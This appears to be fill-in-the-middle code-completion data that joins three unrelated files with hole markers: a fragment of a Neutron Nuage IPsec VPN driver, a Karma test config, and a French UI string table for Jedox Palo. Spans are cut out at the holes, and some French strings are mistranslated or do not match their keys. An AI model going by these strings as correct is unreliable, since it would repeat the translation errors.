self.get_namespace(process_id) process = self.create_process( process_id, vpnservice, namespace) self.processes[process_id] = process elif vpnservice: process.update_vpnservice(vpnservice) return process @lockutils.synchronized('vpn-agent', 'neutron-') def sync(self, context, routers): """Sync status with server side. :param context: context object for RPC call :param routers: Router objects which is created in this sync event There could be many failure cases should be considered including the followings. 1) Agent class restarted 2) Failure on process creation 3) VpnService is deleted during agent down 4) RPC failure In order to handle, these failure cases, the driver needs to take sync strategies. """ vpnservices = self.agent_rpc.get_vpn_services_on_host( context, self.host) router_ids = [vpnservice['router_id'] for vpnservice in vpnservices] sync_router_ids = [router['id'] for router in routers] self._sync_vpn_processes(vpnservices, sync_router_ids) self._delete_vpn_processes(sync_router_ids, router_ids) self._cleanup_stale_vpn_processes(router_ids) self.report_status(context) def get_process_status_cache(self, process): if not self.process_status_cache.get(process.id): self.process_status_cache[process.id] = { 'status': None, 'id': process.vpnservice['id'], 'updated_pending_status': False, 'ipsec_site_connections': {}} return self.process_status_cache[process.id] def report_status(self, context): status_changed_vpn_services = [] for process in self.processes.values(): previous_status = self.get_process_status_cache(process) if self.is_status_updated(process, previous_status): new_status = self.copy_process_status(process) self.update_downed_connections(process.id, new_status) status_changed_vpn_services.append(new_status) self.process_status_cache[process.id] = ( self.copy_process_status(process)) # We need unset updated_pending status after it # is reported to the server side self.unset_updated_pending_status(process) if status_changed_vpn_services: self.agent_rpc.update_status(context, status_changed_vpn_services) def _sync_vpn_processes(self, vpnservices, sync_router_ids): for vpnservice in vpnservices: if vpnservice['router_id'] not in self.processes or ( vpnservice['router_id'] in sync_router_ids): process = self.ensure_process(vpnservice['router_id'], vpnservice=vpnservice) router = self.routers.get(vpnservice['router_id']) if not router: continue process.update() def _delete_vpn_processes(self, sync_router_ids, vpn_router_ids): for process_id in sync_router_ids: if process_id not in vpn_router_ids: self.destroy_process(process_id) def _cleanup_stale_vpn_processes(self, vpn_router_ids): process_ids = [pid for pid in self.processes if pid not in vpn_router_ids] for process_id in process_ids: self.destroy_process(process_id) def is_status_updated(self, process, previous_status): if process.updated_pending_status: return True if process.status != previous_status['status']: return True if (process.connection_status != previous_status['ipsec_site_connections']): return True def unset_updated_pending_status(self, process): process.updated_pending_status = False for connection_status in process.connection_status.values(): connection_status['updated_pending_status'] = False def copy_process_status(self, process): return { 'id': process.vpnservice['id'], 'status': process.status, 'updated_pending_status': process.updated_pending_status, 'ipsec_site_connections': copy.deepcopy(process.connection_status) } def update_downed_connections(self, process_id, new_status): """Update info to be reported, if connections just went down. If there is no longer any information for a connection, because it has been removed (e.g. due to an admin down of VPN service or IPSec connection), but there was previous status information for the connection, mark the connection as down for reporting purposes. """ if process_id in self.process_status_cache: for conn in self.process_status_cache[process_id][IPSEC_CONNS]: if conn not in new_status[IPSEC_CONNS]:<|fim▁hole|> new_status[IPSEC_CONNS][conn] = { 'status': constants.DOWN, 'updated_pending_status': True } def create_router(self, router): """Handling create router event.""" pass def destroy_router(self, process_id): pass def destroy_process(self, process_id): """Destroy process. Disable the process and remove the process manager for the processes that no longer are running vpn service. """ if process_id in self.processes: process = self.processes[process_id] process.disable() if process_id in self.processes: del self.processes[process_id] def plug_to_ovs(self, context, **kwargs): self.nuage_if_driver.plug(kwargs['network_id'], kwargs['port_id'], kwargs['device_name'], kwargs['mac'], 'alubr0', kwargs['ns_name']) self.nuage_if_driver.init_l3(kwargs['device_name'], kwargs['cidr'], kwargs['ns_name']) device = ip_lib.IPDevice(kwargs['device_name'], namespace=kwargs['ns_name']) for gateway_ip in kwargs['gw_ip']: device.route.add_gateway(gateway_ip) def unplug_from_ovs(self, context, **kwargs): self.nuage_if_driver.unplug(kwargs['device_name'], 'alubr0', kwargs['ns_name']) ip = ip_lib.IPWrapper(kwargs['ns_name']) ip.garbage_collect_namespace() # On Redhat deployments an additional directory is created named # 'ip_vti0' in the namespace which prevents the cleanup # of namespace by the neutron agent in 'ip_lib.py' which we clean. if kwargs['ns_name'] in ip.get_namespaces(): ip.netns.delete(kwargs['ns_name']) class NuageOpenSwanDriver(NuageIPsecDriver): def create_process(self, process_id, vpnservice, namespace): return ipsec.OpenSwanProcess( self.conf, process_id, vpnservice, namespace) class NuageStrongSwanDriver(NuageIPsecDriver): def create_process(self, process_id, vpnservice, namespace): return strongswan_ipsec.StrongSwanProcess( self.conf, process_id, vpnservice, namespace) class NuageStrongSwanDriverFedora(NuageIPsecDriver): def create_process(self, process_id, vpnservice, namespace): return fedora_strongswan_ipsec.FedoraStrongSwanProcess( self.conf, process_id, vpnservice, namespace)<|fim▁end|>
<|file_name|>karma.conf.js<|end_file_name|><|fim▁begin|>module.exports = function(config) { config.set({ // base path, that will be used to resolve files and exclude //basePath: '../src/', // frameworks to use frameworks: ['jasmine'], // list of files / patterns to load in the browser files: [ '../src/**/*.js', '../test/**/*.js' ], // list of files to exclude exclude: [ ], // test results reporter to use reporters: ['progress', 'coverage'], preprocessors: { '../src/**/*.js': ['coverage'] }, // configure code coverage coverageReporter: { reporters: [ {type: 'html', dir: '../coverage/'}, {type: 'lcov', dir: '../coverage/'},<|fim▁hole|> }, // web server port port: 9876, // enable / disable colors in the output (reporters and logs) colors: true, // level of logging logLevel: config.LOG_INFO, // enable / disable watching file and executing tests whenever any file changes autoWatch: true, // Start these browsers browsers: ['PhantomJS'], // If browser does not capture in given timeout [ms], kill it captureTimeout: 60000, // Continuous Integration mode // if true, it capture browsers, run tests and exit singleRun: false }); };<|fim▁end|>
{type: 'text-summary'} ]
<|file_name|>loc_fr_FR.js<|end_file_name|><|fim▁begin|>/* * \brief localization strings for fr_FR * * \file loc_fr_FR.js * * Copyright (C) 2006-2009 Jedox AG * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License (Version 2) as published * by the Free Software Foundation at http://www.gnu.org/copyleft/gpl.html. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., 59 Temple * Place, Suite 330, Boston, MA 02111-1307 USA * * You may obtain a copy of the License at * * <a href="http://www.jedox.com/license_palo_bi_suite.txt"> * http://www.jedox.com/license_palo_bi_suite.txt * </a> * * If you are developing and distributing open source applications under the * GPL License, then you are free to use Palo under the GPL License. For OEMs, * ISVs, and VARs who distribute Palo with their products, and do not license * and distribute their source code under the GPL, Jedox provides a flexible * OEM Commercial License. * * \author * Drazen Kljajic <[email protected]> * Mladen Todorovic <[email protected]> * Srdjan Vukadinovic <[email protected]> * Andrej Vrhovac <[email protected]> * Predrag Malicevic <[email protected]> * * \version * SVN: $Id: loc_fr_FR.js 4895 2011-04-27 09:35:11Z l10n-tool $ * */ Jedox.wss.i18n.L10n = 'fr_FR'; Jedox.wss.i18n.separators = [ ',', '.', ';' ]; Jedox.wss.i18n.bool = { 'true': 'VRAI', 'false': 'FAUX' }; Jedox.wss.i18n.strings = { // Menubar "Import": "Import", "Save as": "Enregistrer sous", "Save Workspace": "Volet enregistrer", "File Search": "Recherche de fichiers", "Permission": "Autorisation", "Print Area": "Zone d'impression", "Print Preview": "Aperçu avant impression", "Print": "Imprimer", "Send to": "Envoyer vers", "Form Elements": "Éléments de formulaire", "ComboBox": "Liste déroulante", "Can\'t Repeat": "Répétition impossible", "Quick Publish": "Publication rapide", "Can\'t Undo": "Impossible d'annuler", "Can\'t Redo": "Impossible de rétablir", "WSS Clipboard": "Presse-papiers", "Paste as Hyperlink": "Coller comme lien hypertexte", "Clear": "Effacer", "Delete Rows": "Supprimer les lignes", "Delete Columns": "Supprimer les colonnes", "Move or Shopy Sheet": "Déplacer ou copier la feuille", "Replace": "Remplacer", "Go To": "Atteindre", "Object": "Objet", "Normal": "Normal ", "Page Break Preview": "Aperçu des sauts de page", "Task Pane": "Panneau des tâches", "Header and Footer": "En-tête et pied de page", "Comments": "Commentaires", "Custom View": "Affichage personnalisé", "Full Screen": "Plein écran", "Zoom": "Zoom ", "Entire row": "Insertion de lignes", "Entire column": "Insertion de colonnes", "Worksheet": "Feuille", "Symbol": "Caractères spéciaux", "Page Break": "Saut de page", "Diagram": "Diagramme", "Edit Hyperlink": "Editer le lien hypertexte", "Row": "Ligne", "Row Height": "Hauteur de ligne", "Autofit Row Height": "Ajustement automatique des lignes", "Autofit Column Width": "Ajustement automatique des colonnes", "Sheet": "Feuille", "AutoFormat": "Mise en forme automatique", "Conditional Formatting": "Mise en forme conditionnelle", "Style": "Style ", "Tools": "Outils", "Spelling": "Orthographe", "Research": "Recherche", "Error Checking": "Vérification des erreurs", "Shared Workspace": "Espace de travail partagé", "Share Workbook": "Partager le classeur", "Track Changes": "Suivi des modifications", "Compare and Merge Workbooks": "Comparaison et fusion de classeurs", "Online Collaboration": "Collaboration en ligne", "Goal Seek": "Valeur cible", "Scenarios": "Scénarios", "Formula Auditing": "Audit de formules", "Macros": "Macros", "Add-Ins": "Macros complémentaires", "AutoCorrect Options": "Options de correction automatique", "Customize": "Personnaliser", "Options": "Options ", "Palo": "Palo ", "Paste View": "Créer une vue", "Paste SubSet": "Coller le sous-ensemble", "Paste Data Function": "Fonction d\'accès aux données", "Data Import": "Import de données", "Palo Wizard": "Assistant Palo", "WikiPalo": "WikiPalo", "About": "A propos de", "Data": "Données", "Filter": "Filtre", "Form": "Formulaire", "Subtotals": "Sous-totaux", "Validation": "Validation ", "Table": "Table ", "Text to Columns": "Convertir", "Group and Outline": "Groupe et contours", "Import External Data": "Données externes", "XML": "XML ", "Refresh Data": "Actualisation des données", "Auto-Refresh Data": "Actualisation automatique des données", "Auto-Calculate Data":"Calculation automatique des données", "New Window": "Nouvelle fenêtre", "Arrange": "Réorganiser", "Compare Side by Side with": "Comparer côte à côte avec", "Split": "Fractionner", "Freeze Panes": "Figer les volets", "Worksheet-Server Help": "Aide sur Worksheet-Server", "Jedox Online": "Jedox_Online", "Contact us": "Contactez-nous", "Check for Updates": "Rechercher les mises à jour", "Customer Feedback Options": "Options pour les commentaires utilisateurs", "About Worksheet-Server": "A propos de Worksheet-Server", "About Palo Suite":"A propos de Palo Suite", // Formatbar "Center text": "Au centre", "Align Text Right": "Aligné à droite", "Show/Hide Grid": "Afficher/masquer quadrillage", "Item Lock/Unlock": "Verrouiller les cellules", "Insert Chart": "Insérer un graphique", "Back": "Retour", "Back To": "Retour à", "Refresh / Recalculate": "Actualiser / Recalculer", "Print To PDF": "Imprimer en PDF", "Download": "Télécharger", "Download Workbook": "Télécharger le classeur", // Sheet Selector "First Sheet": "La première feuille", "Previous Sheet": "La feuille précédente", "Next Sheet": "La feuille suivante", "Last Sheet": "La dernière feuille", "Delete Worksheet": "Supprimer la feuille", "delLastWorksheet": "Un classeur doit contenir au moins une feuille.<br>Pour supprimer les feuilles sélectionnées, vous devez insérer d'abord une nouvelle feuille.", "Move Worksheet": "Déplacer la feuille", "moveLastWorksheet": "Un classeur doit contenir au moins une feuille.<br>Pour déplacer les feuilles sélectionnées, vous devez insérer d'abord une nouvelle feuille.", // Workbook "saveFileErr": "Votre fichier n'a pas pu être enregistré !", "errWBSave_nameExists": "{Name} existe déjà.<br>Souhaitez-vous remplacer le fichier ?", "errWBSave_noParent": "Nom du classeur \"{Name}\" est trop court.<br>Il doit contenir au moins 2 caractères.", "errWBSave_noParentAccess": "Nom du classeur \"{Name}\" est trop long.<br>Il ne doit pas contenir plus de 64 caractères.", "errWBSave_noAccess": "Vous ne pouvez pas enregistrer ce classeur car <br>un autre classeur \"(nom) \" est toujours ouvert.<br><br>Sélectionnez un autre nom ou fermez le même classeur.", // Import Dialog "impDlg_fieldLbl": "Fichier à importer (seulement les fichiers xlsx sont permis)", "impDlg_msgWrongType": "Dans ce champ, vous devez entrer la totalité du chemin d'accès au fichier xlsx !", "Upload": "Importer", "Import Error": "Erreur d'importation", "imp_err_msg": "Il n'est pas possible d'importer le fichier \"{Name}\" ", // Insert Function Dialog "Select a category": "Sélectionnez une catégorie", "Select a function": "Sélectionnez une fonction", "Functions": "Fonctions", "Insert Function": "Insérer une fonction", // Save As Dialog "newWBName": "Entrez le nouveau nom de fichier", // Errors "srvNotRespond": "Erreur fatale : le serveur ne répond pas ! \N Le client a été arrêté.", "Invalid input!": "Entrée non valide !", "Override me!": "Ignorez l'erreur !", "Error Data": "Erreur de données", "General Error": "Erreur générale", "Application Backend Error": "Backend application erreur", "Server Error": "Erreur du serveur", "This is a fatal error, re-login will be required!": "Il s'agit d'une erreur fatale. Cela nécessite un nouvel login!", // Insert/Edit Chart "End Select Range": "Fin de la plage sélectionnée", "Select Data Source": "Sélectionnez la source de données", "Input Error": "Erreur de saisie", "Unsupported Element": "Elément non supporté", "Operation Error": "Erreur d'opération", "Data Source": "Source de données", "Chart data range": "Plage de données du graphique", "Group data by": "Série en", "Use series labels": "Utiliser les noms des séries", "Label location": "Position de l'étiquette", "Use category labels": "Utiliser les noms de catégories", "Select Range": "Sélectionner une plage", "Labels": "Étiquettes", "Chart title": "Titre du graphique", "Edit Chart": "Editer le graphique", "Cols": "Cimes", "Delete Chart": "Supprimer le graphique", "chartDlg_invalidChartType": "Le type du graphique n\'est pas valide.", "chartDlg_rangeEmpty": "La plage de cellules est vide. Veuillez entrer des données ou choisir une source de données valide.", "chartDlg_deleteError": "Le graphique sélectionné ne peut pas être supprimé!", "chartDlg_EditError": "Les propriétés actuelles du graphique ne peuvent pas être récupérées", "chartDlg_unsupportedChartType": "Le type de graphique sélectionné sera bientôt disponible !", "chartDlg_genError": "La création du graphique n\'est pas possible. Veuillez vérifier les propriétés du graphique sélectionné.", "Incorect Chart Size": "La taille du graphique est incorrect", "infoChart_wrongSize": "La nouvelle taille du graphique n\'est pas bonne, il est automatiquement ajusté à la taille appropriée.", "infoChart_wrongSize2": "Certains graphiques n'ont pas la taille appropriée. Leur taille sera automatiquement ajustée.", "Change Chart Type": "Changer le type du graphique", "Format Chart Properties": "Formater le graphique", "Scales": "Echelles", "Zones": "Gammes", "Scale": "Echelle", "Zones options": "Options des gammes", "Points": "Aiguilles", "Points options": "Options des aiguilles", "Categories": "Catégories", "Type": "Objet", "Sort Ascending": "Tri croissant", "Sort Descending": "Tri descendant", "Group by": "Groupe par", //editChart "Column": "Histogramme", "Area": "Aires", "X Y (Scatter)": "Nuages de points", "Stock": "Bousier", "Radar": "Radar", "Meter": "Tachymètre", "Clustered Column": "Histogramme groupé", "Stacked Column": "Histogramme empilé", "100% Stacked Column": "Histogramme empilé 100%", "3-D Clustered Column": "Histogramme groupé avec effet 3D", "Stacked Column in 3-D": "Histogramme empilé avec effet 3D", "100% Stacked Column in 3-D": "Histogramme empilé 100% avec effet 3D", "Clustered Cylinder": "Histogramme groupé à formes cylindriques", "Stacked Cylinder": "Histogramme empilé à formes cylindriques", "100% Stacked Cylinder": "Histogramme empilé 100% à formes cylindriques", "Stacked Line": "Courbes empilées", "100% Stacked Line": "Courbes empilées 100%", "Rotated Line": "Courbes pivotées", "Line with Markers": "Courbes avec marques de données affichées à chaque point", "Stacked Line with Markers": "Courbes empilées avec marques de données affichées à chaque point", "100% Stacked Line with Markers": "Courbes empilées 100% avec marques de données affichées à chaque point", "Rotated Line with Markers": "Courbes pivotées avec marques de données affichées à chaque point", "3-D Line": "Courbes avec effet 3D", "Pie in 3-D": "Secteurs avec effet 3D", "Exploded Pie": "Secteurs éclatés", "Exploded Pie in 3-D": "Secteurs éclatés avec effet 3D", "Clustered Bar": "Barres groupées", "Stacked Bar": "Barres empilées", "100% Stacked Bar": "Barres empilées 100%", "Clustered Bar in 3-D": "Barres groupées avec effet 3D", "Stacked Bar in 3-D": "Barres empilées avec effet 3D", "100% Stacked Bar in 3-D": "Barres empilées 100% avec effet 3D", "Clustered Horizontal Cylinder": "Barres groupées de formes cylindriques", "Stacked Horizontal Cylinder": "Barres empilées de formes cylindriques", "100% Stacked Horizontal Cylinder": "Barres empilées 100% de formes cylindriques", "Stacked Area": "Aires empilées", "100% Stacked Area": "Aires empilées 100%", "3-D Area": "Aires avec effet 3D", "Stacked Area in 3-D": "Aires empilées avec effet 3D", "100% Stacked Area in 3-D": "Aires empilées 100% avec effet 3D", "Scatter with only Markers": "Nuage de points avec marques des données", "Scatter with Smooth Lines and Markers": "Nuage de points reliés par une courbe lissée", "Scatter with Smooth Lines": "Nuage de points avec lissage sans marquage des données", "Scatter with Straight Lines and Markers": "Nuage de points reliés par une courbe", "Scatter with Straight Lines": "Nuage de points reliés par une courbe sans marquage des données", "High-Low-Close": "Haut-bas-fermé", "Open-High-Low-Close": "Ouvert-haut-bas-fermé", "Doughnut": "Anneau", "Exploded Doughnut": "Anneau éclaté", "Bubble": "Bulles", "Bubble with a 3-D Effect": "Bulle avec effet 3D", "Radar with Markers": "Radar avec marquage des données", "Filled Radar": "Radar plein", "Odometer Full": "Cercle-Tachymètre", "Odometer Full Percentage": "Cercle-Tachymètre avec %", "Odometer Half": "Demi-Cercle-Tachymètre", "Odometer Half Percentage": "Demi-Cercle-Tachymètre avec %", "Wide Angular Meter": "Grand-Angle-Tachymètre", "Horizontal Line Meter": "Tachymètre horizontal", "Vertical Line Meter": "Tachymètre vertical", "Fill": "Remplir", "Border Color": "Couleur de la bordure", "No fill": "Ne pas remplir", "Solid fill": "Remplissage plein", "Automatic": "Automatique", "No line": "Pas de ligne", "Solid line": "Ligne solide", "Source Data Options": "Options de la source de données", "Chart Data Range": "Plage de données du graphique", "Group Data By": "Série en", "Columns": "Colonnes", "Rows": "Lignes", "Yes": "Oui", "No": "Non", "Font Options": "Options de police", "Title Options": "Options du titre", "Legend Options": "Options de la légende", "Horizontal Axis": "Axe des abscisses", "Horizontal axis": "Axe des abscisses", "Vertical Axis": "Axe des ordonnées", "Vertical axis": "Axe des ordonnées", "Auto": "Auto ", "Fixed": "Fixé", "Major Unit": "Grand unité", "Minor Unit": "Petit unité", "Chart Type": "Type du graphique", "Chart Area": "Zone du graphique", "Plot Area": "Zone de la figure", "Source Data": "Source de données", "Title": "Titre", "Legend": "Légende", "Axes": "Axes", "Format Chart": "Format du graphique", "Series Options":"Options des séries", "Series":"Séries", "Office":"Bureau", "Apex":"Apex", "Aspect":"Aspect", "Name":"Nom", "General":"Général", "No border":"Aucun bordure", "Select Source Data":"Source de données", //Cell Comments "Comment": "Commentaire", "Edit Comment": "Editer le commentaire", "Delete Comment": "Supprimer le commentaire", "Hide Comment": "Masquer le commentaire", "Show/Hide Comment": "Afficher/masquer le commentaire", "Insert Comment": "Insérer un commentaire", // PALO Paste View "Choose Cube": "Sélectionner le cube", "Wrap Labels": "Réaligner", "Fixed width": "Largeur fixe", "Show element selector on doubleclick": "Montrer le sélecteur en double-cliquant", "Paste at selected cell": "Coller dans la cellule sélectionnée", "Page selector": "Selecteur de page", "Column titles": "Titres en en-tête de colonne", "Row titles": "Titres de ligne", "Select Elements": "Choisir un élément", "Please wait": "Veuillez patienter", "Obtaining data!": "Transmission des données!", // Select Elements "B": " B ", "Select Branch": "Choisir une branche", "Invert Selec": "Inverser la sélection", "Paste Vertically": "Coller verticalement", "Ascending": "Ordre croissant", "Descending": "Ordre décroissant", "Clear list": "Vider la liste", "Pick list": "Liste de choix", "_msg: se_Tip": "Astuce", "Show all selection tools": "Afficher tous les outils de sélection", "insert database elements": "Insérer des éléments de la base de données ", "insert server/database (connection)": "Insérer Serveur/base de données (connexion)", "insert cube name": "Insérer le nom du cube", "insert dimension names": "Insérer les noms des dimensions", "Invert Select": "Inverser la sélection", "Paste horizontaly": "Coller horizontalement", // Paste Data Functions "Paste Data Functions": "Fonction d\'accès aux données", "Attribute Cubes": "Cube d'attributs", "Guess Arguments": "Choix automatique des paramètres", // Format Cells Dialog "Format Cells": "Format des cellules", "Number": "Nombre", "Currency": "Monétaire", "Accounting": "Comptabilité", "Date": "Date", "Time": "Heure", "Percentage": "Pourcentage", "Fraction": "Fraction", "Scientific": "Scientifique", "Special": "Spécial", "Custom": "Personnalisé", "$ US Dollar": "Dollar $ US", "€ Euro": "Euro €", "£ GB Pound": "Anglais £", "CHF Swiss Francs": "Francs Suisse CHF", "¥ Japanese Yen": "Yen japonais ¥", "YTL Turkey Liras": "Lires turques YTL", "Zł Poland Zlotych": "Zloty polonais Zł", "₪ Israel, New Shekels": "Nouveaux Shekels israéliens ₪", "HKD Hong Kong Dollar": "Hong Kong Dollar HKD", "KC Czech Koruny": "Couronnes tchèques KC", "CNY China Yuan": "Yen chinois CNY", "P Russian Rubles": "Roubles russes P", "_catDescr: general": "Les cellules avec un format Standard n\'ont pas de format de nombre spécifique.", "_catDescr: number": "Le format Nombre est utilisé pour l\'affichage général des nombres. Les catégories Monétaire et Comptabilité offrent des formats spéciaux pour les valeurs monétaires.", "_catDescr: currency": "Les formats Monétaire sont utilisés pour des valeurs monétaires générales. Utilisez les formats Comptabilité pour aligner les décimaux dans une colonne.", "_catDescr: accounting": "Les formats Comptabilité alignent les symboles monétaires et les décimaux dans une colonne.", "_catDescr: date": "Les formats Date affichent les numéros de date et d\'heure comme valeurs de date. À l\'exception des éléments précédés d\'un astérisque(*), l\'ordre des parties de la date ne change pas en fonction du système d\'exploitation.", "_catDescr: time": "Les formats Heures affichent les numéros de date et heure comme valeurs d\'heure. À l\'exception des éléments précédés d\'un astérisque(*), l\'ordre des parties de la date ou de l\'heure ne change pas en fonction du système d\'exploitation.", "_catDescr: percentage": "Les formats Pourcentage multiplient la valeur de la cellule par 100 et affichent le résultat avec le symbole pourcentage.", "_catDescr: special": "Les formats Spécial sont utilisés pour contrôler des valeurs de liste et de base de données.", "_catDescr: text": "Les cellules de format Texte sont traitées comme du texte même si c\'est un nombre qui se trouve dans la cellule. La cellule est affichée exactement comme elle a été entrée.", "_catDescr: custom": "Entrez le code du format de nombre, en utilisant un des codes existants comme point de départ.", "Sample": "Exemple", "Locale (location)": "Paramètres régionaux (emplacement)", "Category": "Catégorie", "Up to one digit(1/4)": "D'un chiffre(1/4)", "Up to two digits(21/35)": "De deux chiffres(21/35)", "Up to three digits(312/943)": "De trois chiffres(312/943)", "Up to halves(1/2)": "Demis(1/2)", "Up to quarters(2/4)": "Quarts(2/4)", "Up to eights(4/8)": "Huitièmes(4/8)", "Up to sixteenths(8/16)": "Seizièmes(8/16)", "Up to tenths(3/10)": "Dixièmes(3/10)", "Up to hundredths(30/100)": "Centièmes(30/100)", "Context": "Contexte", "Left-to-Right": "De gauche à droite", "Right-to-Left": "De droite à gauche", "Top": "Haut", "Justify": "Justifié", "Distributed": "Distribué", "Distributed (Indent)": "Distribué (Retrait)", "Center across section": "Centré sur plusieurs colonnes", "Left (Indent)": "Gauche (Retrait)", "Decimal places": "Décimales", "Negative numbers": "Nombres négatifs", "Use 1000 Separator (.)": "Utiliser le séparateur de milliers(.)", "Wrap Text": "Renvoyer à la ligne automatiquement", "Text alignment": "Alignement du texte", "Vertical": "Verticale", "Horizontal": "Horizontal", "Text control": "Contrôle du texte", "Merge cells": "Fusionner les cellules", "Text direction": "Orientation du texte", "Line": "Courbes", "Color": "Couleur", "Presets": "Présélections", "Border": "Bordure", "The selected border style can be applied by clicking the presets, preview diagram or the buttons above.": "Le style de bordure sélectionné peut être appliqué en cliquant sur l\'une des présélections ou les autres boutons ci-dessus.",<|fim▁hole|>"Background color": "Couleur de fond", "Pattern style": "Motifs", "Locked": "Verrouillée", "Hidden": "Masquée", "Normal font": "Police normale", "Strikethrough": "Barré", "Overline": "Souligné", "Effects": "Effets", "Font style": "Style ", "This is a TrueType font. The same font will be used on both your printer and your screen.": "Police TrueType, identique à l'écran et à l'impression.", "-1234,10": "-1234,10 ", "1234,10": "1234,10 ", "Protection": "Protection", "Font": "Police ", "Locking cells or hiding formulas has no effect until you protect the worksheet.": "Verrouillé ou Masqué a seulement des effets après la protection de la feuille.", "Merge": "Fusionner", "Wrap text": "Renvoyer à la ligne automatiquement", "General format cells have no formatting.": "Les cellules de format Standard n\'ont pas de format de nombre spécifique.", // Main Context Menu "Edit Micro Chart": "Editer le micrographique", // DynaRanges "Local List": "Liste locale", "Vertical Hyperblock": "DynaRange vertical", "Horizontal Hyperblock": "DynaRange horizontal", "Switch Direction": "Changer la direction", "Edit List": "Editer la liste", // hb Dialog "_tit: hb Properties": "Propriétés du DynaRange", "Standard": "Standard", "Text Format of the List": "Format texte de la liste", "List Selector": "Sélecteur de la liste", "Drill down, begin at level": "Drill down, commencer au niveau", "Indent Text": "Indenter le texte", "Fixed column width": "Largeur fixé", "Display": "Affichage", "Filling": "Remplissage", "Pattern": "Motifs", "_name: UnnamedHb": "DynaRange", "Solid": "Solide", "Dotted": "Pointillé", "Dashed": "En trait", "Direction": "Orientation", "Width": "Largeur", "auto": "auto ", "fixed": "fixé", "Set column width": "Définir la largeur des colonnes", // Unhide Windows "Unhide workbook": "Afficher le classeur", // MicroChart Dialog "Bar": "Barres", "Dots": "Points", "Doted Line": "Ligne point.", "Whisker": "Ligne mince", "Pie": "Secteurs", "0..max": "0...max", "min..max": "min..max", "user defined": "Personnalisé", "Select Cell": "Choix de cellule", "Scaling": "Échelle", "Source": "Source", "Target": "Affichage dans", "Min": "Min", "Max": "Max", "pos. values": "Valeurs positives", "neg. values": "Valeurs négatives", "win": "Profit", "tie": "Equivalent", "lose": "Perte", "first": "Première", "last": "Dernière", "min": "min", "max": "max", // Arrange Windows Dialog "Arrange Windows": "Réorganiser", "Tiled": "Mosaïque", "Cascade": "Cascade", //Open Dialog "Look in": "Rechercher dans", "My Recent Documents": "Documents récents", "My Workbook Documents": "Mes documents", "Go Up one level": "Dossier parent", "Adds New folder to the list": "Ajouter un nouveau dossier à la liste", "File name": "Nom de fichier", "Files of type": "Type de fichiers", "Work Sheet Files": "Feuilles de calcul", "All Files": "Tous les fichiers", "Save as type": "Type de fichiers", "Work Sheet Files (*.wss)": "Feuilles de calcul (*.wss)", "save_as_err_msg": "Le nom du fichier <b>\"{fileName}\"</b> n\'est pas valide. Veuillez entrer un nom valide.", "Database read error":"Erreur de lecture de base de données", "read_data_err":"Impossible de lire la base de données. Veuillez actualiser le groupe de dossiers.", "Database write error":" Erreur d'écriture dans la base de données", "write_data_err":"Impossible d'écrire dans la base. Veuillez actualiser le groupe de dossiers.", // Format Col/Row dialog "Row height": "Hauteur de ligne", "Column width": "Largeur de colonne", // Conditional Formatting dialog + Manage Conditional FMT "Format all cells based on their values": "Mettre en forme toutes les cellules d'après leur valeur", "Format only cells that contain": "Appliquer une mise en forme uniquement aux cellules avec contenu déterminé", "Format only top or bottom ranked values": "Appliquer une mise en forme uniquement aux valeurs classées parmi les premières ou les dernières valeurs", "Format only values that are above or below average": "Appliquer une mise en forme uniquement aux valeurs au-dessus ou en-dessous de la moyenne", "Format only unique or duplicate values": "Appliquer une mise en forme uniquement aux valeurs uniques ou aux doublons", "Use a formula to determine which cells to format": "Utiliser une formule pour déterminer pour quelles cellules le format sera appliqué", "Current Selection": "Sélection actuelle", "This Worksheet": "Cette feuille de calcul", "Edit Rule": "Modifier la règle", "Delete Rule": "Effacer la règle", "Conditional Formatting Rules Manager": "Gestionnaire des règles de mise en forme conditionnelle", "Show formatting rules for": "Affiche les règles de mise en page pour", "Rule (applied in order shown)": "Règle (appliqué de haut en bas)", "Edit Formatting Rule": "Modifier règle de mise en forme", "Applies to": "Appliqué à", "2-Color Scale": "Échelle à deux couleurs", "3-Color Scale": "Échelle à trois couleurs", "Lowest value": "Valeur inférieure", "Percent": "Pourcentage", "Formula": "Formule", "Percentile": "Centile", "Highest value": "Valeur supérieure", "above": "au-dessus", "below": "en-dessous", "equal or above": "égales ou au-dessus", "equal or below": "égales ou en-dessous", "1 std dev above": "1 écart-type au-dessus", "2 std dev above": "2 écarts-type au-dessus", "3 std dev above": "3 écarts-type au-dessus", "1 std dev below": "1 écart-type en-dessous", "2 std dev below": "2 écarts-type en-dessous", "3 std dev below": "3 écarts-type en-dessous", "duplicate": "en double", "unique": "unique", "Cell Value": "Valeur de la cellule", "Specific Text": "Texte spécifique", "Dates Occurring": "Dates se produisant", "Blanks": "Cellules vides", "No Blanks": "Aucune cellule vide", "Errors": "Erreurs", "No errors": "Aucune erreur", "between": "Comprise entre", "not between": "non comprise entre", "equal to": "égale à", "not equal to": "différente de", "greater than": "supérieure à", "less than": "inférieure à", "greater than or equal to": "supérieure ou égale à", "less than or equal to": "inférieure ou égale à", "containing": "contenant", "not containing": "ne contenant pas", "beginning with": "commençant par", "ending with": "se terminant par", "Yesterday": "Hier", "Today": "Aujourd'hui", "Tomorrow": "Demain", "In the last 7 days": "Dans les sept derniers jours", "Last week": "Semaine dernière", "This week": "Cette semaine", "Next week": "Semaine prochaine", "Last month": "Le mois dernier", "This month": "Ce mois", "Next month": "Mois prochain", "Midpoint": "Point central", "New Formatting Rule": "Nouvelle règle de mise en forme", "Select a Rule Type": "Sélectionnez un type de règles", "Edit the Rule Description": "Instructions de règle", "Stop If True": "Arrêter si vrai", "Average Value": "Valeur moyenne", "grater than": "supérieure à", "Minimum": "Minimum", "Maximum": "Maximum", "and": "et", "Format only cells with": "Appliquer une mise en forme uniquement aux cellules contenant", "% of the selected range": "% de la plage sélectionnée", "Format values that rank in the": "Appliquer une mise en forme aux valeurs figurant dans les", "the average for the selected range": "la moyenne de la plage sélectionnée", "Format values that are": "Appliquer une mise en forme aux valeurs qui", "values in the selected range": "Valeurs dans la plage sélectionnée", "Format all": "Appliquer une mise en forme à toutes", "Format values where this formula is true": "Appliquer une mise en forme aux valeurs pour lesquelles cette formule est vraie", // Insert Hyperlink dialog "Text to display": "Nom du lien", "E-mail address": "Adresse de messagerie", "Subject": "Objet", "Edit the new document later": "Modifier le nouveau document ultérieurement", "Edit the new document now": "Modifier le nouveau document maintenant", "Cell Reference": 